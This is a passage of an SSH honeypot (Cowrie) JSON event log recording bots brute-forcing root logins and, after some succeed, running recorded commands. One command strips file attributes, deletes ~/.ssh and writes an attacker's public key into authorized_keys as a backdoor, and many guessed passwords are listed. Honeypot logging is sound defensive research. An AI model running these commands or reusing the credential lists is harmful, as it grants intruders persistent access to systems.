v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:07:04.475283Z","src_ip":"212.227.125.160","session":"41d8407774ae"}
{"eventid":"cowrie.login.success","username":"root","password":"123321","message":"login attempt [root/123321] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:07:04.696924Z","src_ip":"212.227.125.160","session":"41d8407774ae"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:07:05.027293Z","src_ip":"212.227.125.160","session":"41d8407774ae"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T01:07:05.028745Z","src_ip":"212.227.125.160","session":"41d8407774ae"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:07:05.111019Z","src_ip":"212.227.125.160","session":"41d8407774ae"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:07:05.112384Z","src_ip":"212.227.125.160","session":"41d8407774ae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45226,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae6495f9ff1f","protocol":"ssh","message":"New connection: 212.227.235.229:45226 (1.2.3.4:22) [session: ae6495f9ff1f]","sensor":"my-vps","timestamp":"2025-08-31T01:07:06.803253Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:07:07.807656Z","src_ip":"212.227.235.229","session":"ae6495f9ff1f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:07:07.808606Z","src_ip":"212.227.235.229","session":"ae6495f9ff1f"}
{"eventid":"cowrie.session.connect","src_ip":"118.41.246.179","src_port":43106,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8ffecda368d","protocol":"ssh","message":"New connection: 118.41.246.179:43106 (1.2.3.4:22) [session: f8ffecda368d]","sensor":"my-vps","timestamp":"2025-08-31T01:07:13.420190Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:07:13.421489Z","src_ip":"118.41.246.179","session":"f8ffecda368d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:07:13.713359Z","src_ip":"118.41.246.179","session":"f8ffecda368d"}
{"eventid":"cowrie.login.failed","username":"debian","password":"welcome","message":"login attempt [debian/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T01:07:14.334404Z","src_ip":"212.227.235.229","session":"ae6495f9ff1f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36120,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa686fa2da30","protocol":"ssh","message":"New connection: 212.227.125.160:36120 (1.2.3.4:22) [session: fa686fa2da30]","sensor":"my-vps","timestamp":"2025-08-31T01:07:14.840592Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:07:14.841377Z","src_ip":"212.227.125.160","session":"fa686fa2da30"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:07:14.915734Z","src_ip":"212.227.125.160","session":"fa686fa2da30"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin_123","message":"login attempt [root/Admin_123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:07:14.918588Z","src_ip":"118.41.246.179","session":"f8ffecda368d"}
{"eventid":"cowrie.login.failed","username":"worker","password":"worker123","message":"login attempt [worker/worker123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:07:15.172177Z","src_ip":"212.227.125.160","session":"fa686fa2da30"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:07:15.521047Z","src_ip":"118.41.246.179","session":"f8ffecda368d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:07:15.521891Z","src_ip":"118.41.246.179","session":"f8ffecda368d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:07:15.523081Z","src_ip":"118.41.246.179","session":"f8ffecda368d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:07:15.816872Z","src_ip":"118.41.246.179","session":"f8ffecda368d"}
{"eventid":"cowrie.session.closed","duration":"9.3","message":"Connection lost after 9.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:07:16.124126Z","src_ip":"212.227.235.229","session":"ae6495f9ff1f"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:07:16.357138Z","src_ip":"212.227.125.160","session":"fa686fa2da30"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:07:16.460179Z","src_ip":"118.41.246.179","session":"f8ffecda368d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:07:16.461144Z","src_ip":"118.41.246.179","session":"f8ffecda368d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:07:16.755589Z","src_ip":"118.41.246.179","session":"f8ffecda368d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:07:16.756449Z","src_ip":"118.41.246.179","session":"f8ffecda368d"}
{"eventid":"cowrie.session.connect","src_ip":"118.41.246.179","src_port":43956,"dst_ip":"1.2.3.4","dst_port":22,"session":"d4198f314755","protocol":"ssh","message":"New connection: 118.41.246.179:43956 (1.2.3.4:22) [session: d4198f314755]","sensor":"my-vps","timestamp":"2025-08-31T01:07:17.070574Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:07:17.071445Z","src_ip":"118.41.246.179","session":"d4198f314755"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:07:17.375124Z","src_ip":"118.41.246.179","session":"d4198f314755"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:07:18.633669Z","src_ip":"118.41.246.179","session":"d4198f314755"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:07:19.940746Z","src_ip":"118.41.246.179","session":"d4198f314755"}
{"eventid":"cowrie.session.connect","src_ip":"118.41.246.179","src_port":44720,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb6f06f9eed7","protocol":"ssh","message":"New connection: 118.41.246.179:44720 (1.2.3.4:22) [session: cb6f06f9eed7]","sensor":"my-vps","timestamp":"2025-08-31T01:07:20.218570Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:07:20.219456Z","src_ip":"118.41.246.179","session":"cb6f06f9eed7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:07:20.511212Z","src_ip":"118.41.246.179","session":"cb6f06f9eed7"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:07:21.720268Z","src_ip":"118.41.246.179","session":"cb6f06f9eed7"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:07:22.012826Z","src_ip":"118.41.246.179","session":"f8ffecda368d"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:07:22.013911Z","src_ip":"118.41.246.179","session":"cb6f06f9eed7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39748,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc98e5032178","protocol":"ssh","message":"New connection: 212.227.125.160:39748 (1.2.3.4:22) [session: fc98e5032178]","sensor":"my-vps","timestamp":"2025-08-31T01:07:25.284088Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:07:25.284752Z","src_ip":"212.227.125.160","session":"fc98e5032178"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:07:25.358516Z","src_ip":"212.227.125.160","session":"fc98e5032178"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser123","message":"login attempt [ftpuser/ftpuser123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:07:25.581016Z","src_ip":"212.227.125.160","session":"fc98e5032178"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:07:26.723427Z","src_ip":"212.227.125.160","session":"fc98e5032178"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:07:28.445135Z","src_ip":"212.227.235.229","session":"c77258812339"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35840,"dst_ip":"1.2.3.4","dst_port":22,"session":"727efb051fe6","protocol":"ssh","message":"New connection: 212.227.125.160:35840 (1.2.3.4:22) [session: 727efb051fe6]","sensor":"my-vps","timestamp":"2025-08-31T01:07:29.546131Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:07:30.051347Z","src_ip":"212.227.125.160","session":"727efb051fe6"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:07:30.052612Z","src_ip":"212.227.125.160","session":"727efb051fe6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34740,"dst_ip":"1.2.3.4","dst_port":22,"session":"01b5d9355896","protocol":"ssh","message":"New connection: 212.227.235.229:34740 (1.2.3.4:22) [session: 01b5d9355896]","sensor":"my-vps","timestamp":"2025-08-31T01:07:32.448882Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:07:32.456949Z","src_ip":"212.227.235.229","session":"01b5d9355896"}
{"eventid":"cowrie.login.failed","username":"debian","password":"welcome","message":"login attempt [debian/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T01:07:32.518781Z","src_ip":"212.227.125.160","session":"727efb051fe6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:07:32.691585Z","src_ip":"212.227.235.229","session":"01b5d9355896"}
{"eventid":"cowrie.login.success","username":"root","password":"Ka_dJKHJsy6","message":"login attempt [root/Ka_dJKHJsy6] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:07:33.260976Z","src_ip":"212.227.235.229","session":"f2a7634de017"}
